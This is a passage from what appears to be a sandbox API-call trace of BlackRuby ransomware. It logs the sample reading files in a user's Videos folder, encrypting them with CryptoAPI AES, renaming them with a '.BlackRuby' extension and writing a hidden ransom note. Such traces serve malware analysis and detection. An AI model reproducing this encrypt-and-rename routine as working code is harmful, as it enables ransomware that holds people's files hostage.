hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x5 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0062.116] GetLastError () returned 0x12 [0062.116] FindClose (in: hFindFile=0x360e60 | out: hFindFile=0x360e60) returned 1 [0062.116] SetErrorMode (uMode=0x0) returned 0x1 [0062.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-", lpFilePart=0x0) returned 0x27 [0062.116] GetLastError () returned 0x12 [0062.116] SetErrorMode (uMode=0x1) returned 0x0 [0062.116] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e60 [0062.116] GetLastError () returned 0x12 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x12 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x12 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x12 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x12 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x12 [0062.116] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.116] GetLastError () returned 0x12 [0062.117] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0062.117] GetLastError () returned 0x12 [0062.117] FindClose (in: hFindFile=0x360e60 | out: hFindFile=0x360e60) returned 1 [0062.117] SetErrorMode (uMode=0x0) returned 0x1 [0062.117] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv", lpFilePart=0x0) returned 0x3e [0062.117] GetLastError () returned 0x12 [0062.117] SetErrorMode (uMode=0x1) returned 0x0 [0062.117] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\qxpl2x9pe-5n8avato.flv"), fInfoLevelId=0x0, lpFileInformation=0x1d0de48 | out: lpFileInformation=0x1d0de48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6a4bc0, ftCreationTime.dwHighDateTime=0x1d3556b, ftLastAccessTime.dwLowDateTime=0x5f586720, ftLastAccessTime.dwHighDateTime=0x1d34a29, ftLastWriteTime.dwLowDateTime=0x5f586720, ftLastWriteTime.dwHighDateTime=0x1d34a29, nFileSizeHigh=0x0, nFileSizeLow=0x82b4)) returned 1 [0062.117] GetLastError () returned 0x12 [0062.117] SetErrorMode (uMode=0x0) returned 0x1 [0062.117] GetFileType (hFile=0x258) returned 0x1 [0062.117] SetErrorMode (uMode=0x0) returned 0x1 [0062.117] GetFileType (hFile=0x258) returned 0x1 [0062.117] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x82b4 [0062.117] GetLastError () returned 0x0 [0062.117] ReadFile (in: hFile=0x258, lpBuffer=0x1d0fdd8, nNumberOfBytesToRead=0x82b4, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1d0fdd8*, lpNumberOfBytesRead=0x18ed18*=0x82b4, lpOverlapped=0x0) returned 1 [0062.118] GetLastError () returned 0x0 [0062.154] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b83720, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360da0) returned 1 [0062.154] GetLastError () returned 0x0 [0062.154] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.154] GetLastError () returned 0x0 [0062.159] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.159] GetLastError () returned 0x0 [0062.159] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360d20) returned 1 [0062.159] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.159] GetLastError () returned 0x0 [0062.159] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1bb076c*=0x1, dwFlags=0x0) returned 1 [0062.159] GetLastError () returned 0x0 [0062.160] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1bb0738, dwFlags=0x0) returned 1 [0062.160] GetLastError () returned 0x0 [0062.160] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb07b4*, pdwDataLen=0x18ed08*=0x83b0, dwBufLen=0x83b0 | out: pbData=0x1bb07b4*, pdwDataLen=0x18ed08*=0x83b0) returned 1 [0062.160] GetLastError () returned 0x0 [0062.160] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc0f40*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bc0f40*, pdwDataLen=0x18ed20*=0x10) returned 1 [0062.160] GetLastError () returned 0x0 [0062.160] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bc0f70*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bc0f70*, pdwDataLen=0x18ed28*=0x10) returned 1 [0062.160] GetLastError () returned 0x0 [0062.160] CryptDestroyKey (hKey=0x360da0) returned 1 [0062.160] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.160] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.160] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv", lpFilePart=0x0) returned 0x3e [0062.160] GetLastError () returned 0x0 [0062.160] SetErrorMode (uMode=0x1) returned 0x0 [0062.160] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\qxpl2x9pe-5n8avato.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.161] GetLastError () returned 0xb7 [0062.161] GetFileType (hFile=0x258) returned 0x1 [0062.161] SetErrorMode (uMode=0x0) returned 0x1 [0062.161] GetFileType (hFile=0x258) returned 0x1 [0062.163] CloseHandle (hObject=0x258) returned 1 [0062.163] GetLastError () returned 0xb7 [0062.163] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv", lpFilePart=0x0) returned 0x3e [0062.163] GetLastError () returned 0xb7 [0062.163] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_mXxwE5dsE3bGm9TayGpPfW5HRYyDwD7fosxhaNyClTTa0.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_mXxwE5dsE3bGm9TayGpPfW5HRYyDwD7fosxhaNyClTTa0.BlackRuby", lpFilePart=0x0) returned 0x69 [0062.163] GetLastError () returned 0xb7 [0062.163] SetErrorMode (uMode=0x1) returned 0x0 [0062.163] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\qxpl2x9pe-5n8avato.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6a4bc0, ftCreationTime.dwHighDateTime=0x1d3556b, ftLastAccessTime.dwLowDateTime=0x5f586720, ftLastAccessTime.dwHighDateTime=0x1d34a29, ftLastWriteTime.dwLowDateTime=0x2d3e9760, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x83c0)) returned 1 [0062.163] GetLastError () returned 0xb7 [0062.163] SetErrorMode (uMode=0x0) returned 0x1 [0062.163] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\qxPL2X9pE-5N8avATo.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\qxpl2x9pe-5n8avato.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_mXxwE5dsE3bGm9TayGpPfW5HRYyDwD7fosxhaNyClTTa0.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\encrypted_mxxwe5dse3bgm9taygppfw5hryydwd7fosxhanycltta0.blackruby")) returned 1 [0062.164] GetLastError () returned 0xb7 [0062.165] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0062.165] GetLastError () returned 0xb7 [0062.165] SetErrorMode (uMode=0x1) returned 0x0 [0062.165] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.165] GetLastError () returned 0x0 [0062.165] GetFileType (hFile=0x258) returned 0x1 [0062.166] SetErrorMode (uMode=0x0) returned 0x1 [0062.166] GetFileType (hFile=0x258) returned 0x1 [0062.168] CloseHandle (hObject=0x258) returned 1 [0062.168] GetLastError () returned 0x0 [0062.168] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0062.168] GetLastError () returned 0x0 [0062.168] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0062.169] GetLastError () returned 0x0 [0062.169] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", lpFilePart=0x0) returned 0x3b [0062.169] GetLastError () returned 0x0 [0062.169] SetErrorMode (uMode=0x1) returned 0x0 [0062.169] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\swpt8ohimrxpnsc.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1bf696c | out: lpFileInformation=0x1bf696c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf845bfe0, ftCreationTime.dwHighDateTime=0x1d35641, ftLastAccessTime.dwLowDateTime=0x2f7aaae0, ftLastAccessTime.dwHighDateTime=0x1d35596, ftLastWriteTime.dwLowDateTime=0x2f7aaae0, ftLastWriteTime.dwHighDateTime=0x1d35596, nFileSizeHigh=0x0, nFileSizeLow=0xd6a5)) returned 1 [0062.169] GetLastError () returned 0x0 [0062.169] SetErrorMode (uMode=0x0) returned 0x1 [0062.169] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", lpFilePart=0x0) returned 0x3b [0062.169] GetLastError () returned 0x0 [0062.169] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", lpFilePart=0x0) returned 0x3b [0062.169] GetLastError () returned 0x0 [0062.169] SetErrorMode (uMode=0x1) returned 0x0 [0062.169] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\swpt8ohimrxpnsc.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.169] GetLastError () returned 0x0 [0062.169] GetFileType (hFile=0x258) returned 0x1 [0062.169] SetErrorMode (uMode=0x0) returned 0x1 [0062.169] GetFileType (hFile=0x258) returned 0x1 [0062.170] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0xd6a5 [0062.170] GetLastError () returned 0x0 [0062.170] ReadFile (in: hFile=0x258, lpBuffer=0x1bf8700, nNumberOfBytesToRead=0xd6a5, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bf8700*, lpNumberOfBytesRead=0x18ed18*=0xd6a5, lpOverlapped=0x0) returned 1 [0062.170] GetLastError () returned 0x0 [0062.170] CloseHandle (hObject=0x258) returned 1 [0062.170] GetLastError () returned 0x0 [0062.171] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", lpFilePart=0x0) returned 0x3b [0062.171] GetLastError () returned 0x0 [0062.171] SetErrorMode (uMode=0x1) returned 0x0 [0062.171] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\swpt8ohimrxpnsc.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf845bfe0, ftCreationTime.dwHighDateTime=0x1d35641, ftLastAccessTime.dwLowDateTime=0x2f7aaae0, ftLastAccessTime.dwHighDateTime=0x1d35596, ftLastWriteTime.dwLowDateTime=0x2f7aaae0, ftLastWriteTime.dwHighDateTime=0x1d35596, nFileSizeHigh=0x0, nFileSizeLow=0xd6a5)) returned 1 [0062.171] GetLastError () returned 0x0 [0062.171] SetErrorMode (uMode=0x0) returned 0x1 [0062.171] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c680) returned 1 [0062.171] GetLastError () returned 0x0 [0062.182] CryptImportKey (in: hProv=0x37c680, pbData=0x1c6d828, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ae0) returned 1 [0062.182] GetLastError () returned 0x0 [0062.182] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.182] GetLastError () returned 0x0 [0062.188] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360de0) returned 1 [0062.188] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1c9a874*=0x1, dwFlags=0x0) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1c9a840, dwFlags=0x0) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c9a8bc*, pdwDataLen=0x18ed08*=0xd7a0, dwBufLen=0xd7a0 | out: pbData=0x1c9a8bc*, pdwDataLen=0x18ed08*=0xd7a0) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb5828*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cb5828*, pdwDataLen=0x18ed20*=0x10) returned 1 [0062.188] GetLastError () returned 0x0 [0062.188] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cb5858*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cb5858*, pdwDataLen=0x18ed28*=0x10) returned 1 [0062.188] GetLastError () returned 0x0 [0062.189] CryptDestroyKey (hKey=0x360ae0) returned 1 [0062.189] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.189] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.189] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", lpFilePart=0x0) returned 0x3b [0062.189] GetLastError () returned 0x0 [0062.189] SetErrorMode (uMode=0x1) returned 0x0 [0062.189] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\swpt8ohimrxpnsc.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.190] GetLastError () returned 0xb7 [0062.190] GetFileType (hFile=0x258) returned 0x1 [0062.190] SetErrorMode (uMode=0x0) returned 0x1 [0062.190] GetFileType (hFile=0x258) returned 0x1 [0062.192] CloseHandle (hObject=0x258) returned 1 [0062.192] GetLastError () returned 0xb7 [0062.192] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4", lpFilePart=0x0) returned 0x3b [0062.192] GetLastError () returned 0xb7 [0062.192] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_ysBvQrjX6i1t3XBePwpes1jMJrOLs7RbMWd4q1.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_ysBvQrjX6i1t3XBePwpes1jMJrOLs7RbMWd4q1.BlackRuby", lpFilePart=0x0) returned 0x62 [0062.192] GetLastError () returned 0xb7 [0062.192] SetErrorMode (uMode=0x1) returned 0x0 [0062.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\swpt8ohimrxpnsc.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf845bfe0, ftCreationTime.dwHighDateTime=0x1d35641, ftLastAccessTime.dwLowDateTime=0x2f7aaae0, ftLastAccessTime.dwHighDateTime=0x1d35596, ftLastWriteTime.dwLowDateTime=0x2d435a20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xd7b0)) returned 1 [0062.192] GetLastError () returned 0xb7 [0062.192] SetErrorMode (uMode=0x0) returned 0x1 [0062.192] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\sWpT8OhiMrXpnSC.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\swpt8ohimrxpnsc.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_ysBvQrjX6i1t3XBePwpes1jMJrOLs7RbMWd4q1.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\encrypted_ysbvqrjx6i1t3xbepwpes1jmjrols7rbmwd4q1.blackruby")) returned 1 [0062.193] GetLastError () returned 0xb7 [0062.193] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0062.193] GetLastError () returned 0xb7 [0062.193] SetErrorMode (uMode=0x1) returned 0x0 [0062.193] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.193] GetLastError () returned 0x5 [0062.194] SetErrorMode (uMode=0x0) returned 0x1 [0062.194] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", lpFilePart=0x0) returned 0x36 [0062.194] GetLastError () returned 0x5 [0062.194] SetErrorMode (uMode=0x1) returned 0x0 [0062.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\vd7euuj4 p.avi"), fInfoLevelId=0x0, lpFileInformation=0x1ce0368 | out: lpFileInformation=0x1ce0368*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99262310, ftCreationTime.dwHighDateTime=0x1d3530d, ftLastAccessTime.dwLowDateTime=0xb14a3290, ftLastAccessTime.dwHighDateTime=0x1d3521f, ftLastWriteTime.dwLowDateTime=0xb14a3290, ftLastWriteTime.dwHighDateTime=0x1d3521f, nFileSizeHigh=0x0, nFileSizeLow=0x12ed1)) returned 1 [0062.194] GetLastError () returned 0x5 [0062.194] SetErrorMode (uMode=0x0) returned 0x1 [0062.194] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", lpFilePart=0x0) returned 0x36 [0062.194] GetLastError () returned 0x5 [0062.194] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", lpFilePart=0x0) returned 0x36 [0062.195] GetLastError () returned 0x5 [0062.195] SetErrorMode (uMode=0x1) returned 0x0 [0062.195] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\vd7euuj4 p.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.195] GetLastError () returned 0x0 [0062.195] GetFileType (hFile=0x258) returned 0x1 [0062.195] SetErrorMode (uMode=0x0) returned 0x1 [0062.195] GetFileType (hFile=0x258) returned 0x1 [0062.195] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x12ed1 [0062.195] GetLastError () returned 0x0 [0062.195] ReadFile (in: hFile=0x258, lpBuffer=0x1ce2108, nNumberOfBytesToRead=0x12ed1, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1ce2108*, lpNumberOfBytesRead=0x18ed18*=0x12ed1, lpOverlapped=0x0) returned 1 [0062.196] GetLastError () returned 0x0 [0062.196] CloseHandle (hObject=0x258) returned 1 [0062.196] GetLastError () returned 0x0 [0062.196] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", lpFilePart=0x0) returned 0x36 [0062.196] GetLastError () returned 0x0 [0062.196] SetErrorMode (uMode=0x1) returned 0x0 [0062.196] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\vd7euuj4 p.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99262310, ftCreationTime.dwHighDateTime=0x1d3530d, 